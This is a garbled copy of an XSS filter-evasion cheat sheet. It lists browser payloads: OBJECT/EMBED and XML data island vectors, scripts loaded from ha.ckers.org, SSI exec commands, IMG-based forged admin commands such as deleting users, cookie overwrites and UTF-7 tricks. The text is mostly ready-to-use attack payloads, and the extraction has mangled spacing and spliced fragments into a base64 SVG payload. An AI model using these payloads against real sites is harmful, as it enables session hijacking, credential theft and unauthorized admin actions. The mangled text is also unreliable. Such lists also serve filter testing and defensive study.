    UsinganOBJECTtagyoucanembedXSSdirectly(thisisunverifiedsonobrow sersupportis added): <OBJECTclassid=clsid:ae24fdae03c611d18b76 0080c744f389><paramname=url value=javascript:alert('XSS')></OBJECT>

    UsinganEMBEDtagyoucanembedaFlashmoviethatcontainsXSS.Clickhereforademo.Ifyou addtheattributesallow ScriptAccess="never"andallow netw orking="internal"itcanmitigatethis risk(thankyoutoJonathanVanascofortheinfo).: <EMBEDSRC="http://ha.ckers.org/xss.sw f" Allow ScriptAccess="alw ays"></EMBED> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    YoucanEMBEDSVGw hichcancontainyourXSSvector.Thisexampleonlyw orksinFirefox, butit'sbetterthantheabovevectorinFirefoxbecauseitdoesnotrequiretheusertohaveFlash turnedonorinstalled.ThankstonEUrOOforthisone.

    <EMBED SRC="data:image/svg+xmlbase64,PHN2ZyB4bWxuczp zdmc9Imh0dH A6Ly93d3cudzMub3JnLzIw MDAvc3ZnIiB4bWxucz0iaH Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] R0cDovL3d3dy53My5vcmcv MjAw MC9zdmciIHhtbG5zOnhsaW5rPSJodHRw Oi8vd3d 3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSI UsingActionScriptinsideflashcanobfuscateyourXSSvector: xOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYX a="get" Njcmlw dCI+YWxlcnQoIlh b="URL(\"" TUyIpOzw vc2NyaXB0Pjw vc3ZnPg==" c="javascript:" type="image/svg+xml" d="alert('XSS')\")" Allow ScriptAccess="alw ays"></EMBED> eval(a+b+c+d) Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    XMLnamespace.ThehtcfilemustbelocatedonthesameserverasyourXSSvector: <HTMLxmlns:xss> <?importnamespace="xss" implementation="http://ha.ckers.org/xss.htc"> <xss:xss>XSS</xss:xss> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] </HTML>

    XMLdataislandw ithCDATAobfuscation(thisXSSattackw orksonlyinIEandNetscape8.1inIE renderingenginemode)vectorfoundbySecConsultw hileauditingYahoo: <XMLID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS')">]]> </C></X></xml><SPANDATASRC=#IDATAFLD=C DATAFORMATAS=HTML></SPAN> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    XMLdataislandw ithcommentobfuscation(thisisanothertakeonthesameexploitthatdoesn't useCDATAfields,butratherusescommentstobreakupthejavascriptdirective): <XMLID="xss"><I><B>&ltIMGSRC="javas<! >cript:alert('XSS')"&gt</B></I></XML> <SPANDATASRC="#xss"DATAFLD="B" DATAFORMATAS="HTML"></SPAN> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    LocallyhostedXMLw ithembeddedJavaScriptthatisgeneratedusinganXMLdataisland.Thisis thesameasabovebutinsteadreferrstoalocallyhosted(mustbeonthesameserver)XMLfile thatcontainsyourcrosssitescriptingvector.Youcanseetheresulthere: <XMLSRC="xsstest.xml"ID=I></XML> <SPANDATASRC=#IDATAFLD=C DATAFORMATAS=HTML></SPAN> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    HTML+TIMEinXML.Thisishow GreyMagichackedHotmailandYahoo!.Thisonlyw orksin InternetExplorerandNetscape8.1inIErenderingenginemodeandrememberthatyouneedtobe betw eenHTMLandBODYtagsforthistow ork: <HTML><BODY> <?xml:namespaceprefix="t"ns="urn:schemas microsoftcom:time"> <?importnamespace="t" Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] implementation="#default#time2"> <t:setattributeName="innerHTML"to="XSS&ltSCRIPT DEFER&gtalert(&quotXSS&quot)&lt/SCRIPT&gt"> </BODY></HTML> Assumingyoucanonlyfitinafew charactersanditfiltersagainst".js"youcanrenameyour JavaScriptfiletoanimageasanXSSvector: <SCRIPTSRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    SSI(ServerSideIncludes)requiresSSItobeinstalledontheservertousethisXSSvector.I probablydon'tneedtomentionthis,butifyoucanruncommandsontheservertherearenodoubt muchmoreseriousissues: <!#execcmd="/bin/echo'<SCR'"><!#exec cmd="/bin/echo'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    PHPrequiresPHPtobeinstalledontheservertousethisXSSvector.Again,ifyoucanrunany scriptsremotelylikethis,thereareprobablymuchmoredireissues: <?echo('<SCR)' echo('IPT>alert("XSS")</SCRIPT>')?> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    IMGEmbeddedcommandsthisw orksw henthew ebpagew herethisisinjected(likeaw eb board)isbehindpassw ordprotectionandthatpassw ordprotectionw orksw ithothercommands onthesamedomain.Thiscanbeusedtodeleteusers,addusers(iftheuserw hovisitsthepage isanadministrator),sendcredentialselsew here,etc....Thisisoneofthelesserusedbutmore usefulXSSvectors: <IMG SRC="http://w w w .thesiteyouareon.com/somecommand. php?somevariables=maliciouscode"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    IMGEmbeddedcommandspartIIthisismorescarybecausethereareabsolutelynoidentifiers thatmakeitlooksuspiciousotherthanitisnothostedonyourow ndomain.Thevectorusesa302 or304(othersw orktoo)toredirecttheimagebacktoacommand.Soanormal<IMG SRC="http://badguy.com/a.jpg">couldactuallybeanattackvectortoruncommandsastheuser w hoview stheimagelink.Hereisthe.htaccess(underApache)linetoaccomplishthevector (thankstoTimoforpartofthis): Redirect302/a.jpg http://victimsite.com/admin.asp&deleteuser Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    CookiemanipulationadmittidlythisisprettyobscurebutIhaveseenafew examplesw here <METAisallow edandyoucanuseittooverw ritecookies.Thereareotherexamplesofsites w hereinsteadoffetchingtheusernamefromadatabaseitisstoredinsideofacookietobe displayedonlytotheuserw hovisitsthepage.Withthesetw oscenarioscombinedyoucan modifythevictim'scookiew hichw illbedisplayedbacktothemasJavaScript(youcanalsouse thistologpeopleoutorchangetheiruserstates,getthemtologinasyou,etc...): <METAHTTPEQUIV="SetCookie" Content="USERID=&ltSCRIPT&gtalert('XSS')&lt/SCRIPT &gt"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    UTF7encodingifthepagethattheXSSresidesondoesn'tprovideapagecharsetheader,or anybrow serthatissettoUTF7encodingcanbeexploitedw iththefollow ing(ThankstoRoman Ivanovforthisone).Clickhereforanexample(youdon'tneedthecharsetstatementiftheuser's brow serissettoautodetectandthereisnooverridingcontenttypesonthepageinInternet ExplorerandNetscape8.1inIErenderingenginemode).Thisdoesnotw orkinanymodern brow serw ithoutchangingtheencodingtypew hichisw hyitismarkedascompletely unsupported.WatchfirefoundthisholeinGoogle'scustom404script.: <HEAD><METAHTTPEQUIV="CONTENTTYPE" CONTENT="text/htmlcharset=UTF7"></HEAD>+ADw SCRIPT+AD4alert('XSS')+ADw /SCRIPT+AD4 Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    You might also like